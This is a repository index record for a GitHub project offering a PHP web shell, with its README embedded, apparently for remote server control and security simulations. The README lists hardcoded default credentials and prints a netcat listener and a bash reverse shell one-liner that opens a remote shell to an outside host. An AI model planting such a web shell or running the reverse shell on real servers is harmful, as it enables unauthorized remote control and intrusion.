{"id":26933328,"url":"https://github.com/rootshelll/yavuzlar-webshell","last_synced_at":"2026-01-12T09:42:11.821Z","repository":{"id":281206840,"uuid":"944556340","full_name":"RootShelll/Yavuzlar-WebShell","owner":"RootShelll","description":"Discover Yavuzlar WebShell, a powerful web-based shell tool for file management, terminal access, and reverse shell operations. Learn how it enhances remote administration and cybersecurity simulations.","archived":false,"fork":false,"pushed_at":"2025-03-08T06:32:34.000Z","size":329,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-02T09:18:36.269Z","etag":null,"topics":["cybersecurity","file-manager","php-shell","remote-administration","reverse-shell","terminal","web-based-shell","yavuzlar-webshell"],"latest_commit_sha":null,"homepage":"https://r00t-shell.com/yavuzlar-webshell-web-based-shell-for-cybersecurity/","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RootShelll.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-03-07T14:58:51.000Z","updated_at":"2025-03-08T06:32:38.000Z","dependencies_parsed_at":"2025-03-07T15:50:11.238Z","dependency_job_id":null,"html_url":"https://github.com/RootShelll/Yavuzlar-WebShell","commit_stats":null,"previous_names":["rootshelll/yavuzlar-webshell"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RootShelll/Yavuzlar-WebShell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RootShelll%2FYavuzlar-WebShell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RootShelll%2FYavuzlar-WebShell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RootShelll%2FYavuzlar-WebShell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RootShelll%2FYavuzlar-WebShell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RootShelll","download_url":"https://codeload.github.com/RootShelll/Yavuzlar-WebShell/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RootShelll%2FYavuzlar-WebShell/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28337740,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-12T06:09:07.588Z","status":"ssl_error","status_checked_at":"2026-01-12T06:05:18.301Z","response_time":98,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","file-manager","php-shell","remote-administration","reverse-shell","terminal","web-based-shell","yavuzlar-webshell"],"created_at":"2025-04-02T09:18:39.064Z","updated_at":"2026-01-12T09:42:11.806Z","avatar_url":"https://github.com/RootShelll.png","language":"PHP","readme":"# Yavuzlar WebShell - Web-based Shell for Cybersecurity\n\n![Yavuzlar WebShell](https://r00t-shell.com/wp-content/uploads/2025/03/yavuzshell.gif)\n\n## 🚀 What is Yavuzlar WebShell? 🤔\n\nYavuzlar WebShell is a web-based shell application that allows you to manage server files, execute terminal commands, and use reverse shells—all from the comfort of your browser. It was built using **PHP** and **CSS** with a minimalist interface designed for remote administration and cybersecurity simulations.\n\n---\n\n## 🔑 Key Features\n\n- **File Manager 📁**: Easily upload, edit, delete, and download files securely over the web.\n- **Terminal 🖥️**: Execute system commands through a browser-based terminal.\n- **Reverse Shell 🔄**: Use reverse shell techniques for remote system control.\n- **Directory Navigation 📂**: Navigate directories and manage file permissions effortlessly.\n- **Security 🔒**: Requires user login for all operations, ensuring secure access.\n\n---\n\n## 🚀 Getting Started\n\n### 📥 Installation\n\n1. Clone the repository:\n   ```sh\n   git clone https://github.com/RootShelll/Yavuzlar-WebShell.git\n   ```\n2. Upload the files to your web server.\n3. Ensure PHP is installed and configured properly on your server.\n4. Open the WebShell in your browser.\n\n### 🔑 Default Login Credentials\n\n```plaintext\nUsername: admin\nPassword: R00t\n```\n\n\u003e ⚠️ **Important Note:**\n\u003e Make sure your server is properly secured, and only authorized users have access to the WebShell.\n\n---\n\n## 🔧 Advanced Usage\n\nIf you're familiar with command-line tools, you can enhance your experience by using the terminal feature to run various system commands. For example:\n\n```sh\nls -la  # List all files in the current directory\n```\n\n```sh\ncat filename.txt  # Display the content of a text file\n```\n\n### 🔄 Reverse Shell Operations\n\nUse the following commands to establish a reverse shell connection:\n\n```sh\nnc -lvp 4444  # Listen on port 4444 for incoming connections\n```\n\n```sh\nbash -i \u003e\u0026 /dev/tcp/your_ip/4444 0\u003e\u00261  # Reverse shell with bash\n```\n\n---\n\n## 📜 License\n\nThis project is licensed under the **MIT License** - see the [LICENSE](LICENSE) file for details.\n\n## 📬 Contact\n\nFor support, open an issue or reach out via email: **help@r00t-shell.com**\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frootshelll%2Fyavuzlar-webshell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frootshelll%2Fyavuzlar-webshell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frootshelll%2Fyavuzlar-webshell/lists"}